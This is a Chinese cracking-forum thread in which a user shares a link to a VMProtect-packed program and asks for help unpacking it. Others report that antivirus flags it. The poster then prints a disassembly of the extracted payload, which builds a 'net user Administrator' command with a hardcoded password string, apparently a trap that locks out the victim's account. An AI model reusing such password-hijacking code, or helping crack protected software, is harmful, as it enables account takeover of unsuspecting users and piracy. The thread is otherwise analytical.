一款易游VMP不知道如何下手

10069685351 · 发表于 2020-1-29 13:58

https://www.lanzouw.com/i8wnl2b
求帮忙
最好出个教程，谢谢各位大佬！

byh3025 · 发表于 2020-1-29 15:22

直接被火绒干掉了

狼巢 · 发表于 2020-1-29 16:02

提取会提取出来个程序你看看吧

10069685351 · 发表于 2020-1-30 14:39

004010D3    C3          retn
004010D4  |.  8BEC       mov ebp,esp
004010D6  |.  81EC 10000000 sub esp,0x10
004010DC  |.  6A 01       push 0x1
004010DE  |.  B8 DC1A4800 mov eax,4f20215.00481ADC                ;  666888
004010E3  |.  8945 FC    mov [local.1],eax
004010E6  |.  8D45 FC    lea eax,[local.1]
004010E9  |.  50          push eax
004010EA  |.  B8 E31A4800 mov eax,4f20215.00481AE3                ;  3422144530dHyVdkyV
004010EF  |.  8945 F8    mov [local.2],eax
004010F2  |.  8D45 F8    lea eax,[local.2]
004010F5  |.  50          push eax
004010F6  |.  E8 7F020000 call 4f20215.0040137A
004010FB  |.  8945 F4    mov [local.3],eax
004010FE  |.  8B5D F8    mov ebx,[local.2]
00401101  |.  85DB       test ebx,ebx
00401103  |.  74 09       je X4f20215.0040110E
00401105  |.  53          push ebx
00401106  |.  E8 88150000 call 4f20215.00402693
0040110B  |.  83C4 04    add esp,0x4
0040110E  |>  8B5D FC    mov ebx,[local.1]
00401111  |.  85DB       test ebx,ebx
00401113  |.  74 09       je X4f20215.0040111E
00401115  |.  53          push ebx
00401116  |.  E8 78150000 call 4f20215.00402693
0040111B  |.  83C4 04    add esp,0x4
0040111E  |>  FF75 F4    push [local.3]
00401121  |.  68 F61A4800 push 4f20215.00481AF6                   ;  net user Administrator
00401126  |.  B9 02000000 mov ecx,0x2
0040112B  |.  E8 3FFFFFFF call 4f20215.0040106F
00401130  |.  83C4 08    add esp,0x8
00401133  |.  8945 F0    mov [local.4],eax
00401136  |.  8B5D F4    mov ebx,[local.3]
00401139  |.  85DB       test ebx,ebx
0040113B  |.  74 09       je X4f20215.00401146
0040113D  |.  53          push ebx
0040113E  |.  E8 50150000 call 4f20215.00402693
00401143  |.  83C4 04    add esp,0x4
00401146  |>  68 01030080 push 0x80000301
0040114B  |.  6A 00       push 0x0
0040114D  |.  68 01000000 push 0x1
00401152  |.  68 02000080 push 0x80000002
00401157  |.  6A 00       push 0x0
00401159  |.  68 00000000 push 0x0
0040115E  |.  68 04000080 push 0x80000004
00401163  |.  6A 00       push 0x0
00401165  |.  8B45 F0    mov eax,[local.4]
00401168  |.  85C0       test eax,eax
0040116A  |.  75 05       jnz X4f20215.00401171
0040116C  |.  B8 0E1B4800 mov eax,4f20215.00481B0E
00401171  |>  50          push eax
00401172  |.  68 03000000 push 0x3
00401177  |.  BB 60294000 mov ebx,4f20215.00402960
0040117C  |.  E8 0C150000 call 4f20215.0040268D
00401181  |.  83C4 28    add esp,0x28
00401184  |.  8B5D F0    mov ebx,[local.4]
00401187  |.  85DB       test ebx,ebx
00401189  |.  74 09       je X4f20215.00401194
0040118B  |.  53          push ebx
0040118C  |.  E8 02150000 call 4f20215.00402693
00401191  |.  83C4 04    add esp,0x4
00401194  |>  6A 01       push 0x1
00401196  |.  B8 DC1A4800 mov eax,4f20215.00481ADC                ;  666888
0040119B  |.  8945 FC    mov [local.1],eax
0040119E  |.  8D45 FC    lea eax,[local.1]
004011A1  |.  50          push eax
004011A2  |.  B8 E31A4800 mov eax,4f20215.00481AE3                ;  3422144530dHyVdkyV
004011A7  |.  8945 F8    mov [local.2],eax

提出来只是个坑，我把它头ret了，就不会运行了

战音未来 · 发表于 2020-1-31 23:55

拖出来的有点像病毒

懒得热情 · 发表于 2023-11-7 11:51

学习学习

		自动登录	找回密码
密码			立即注册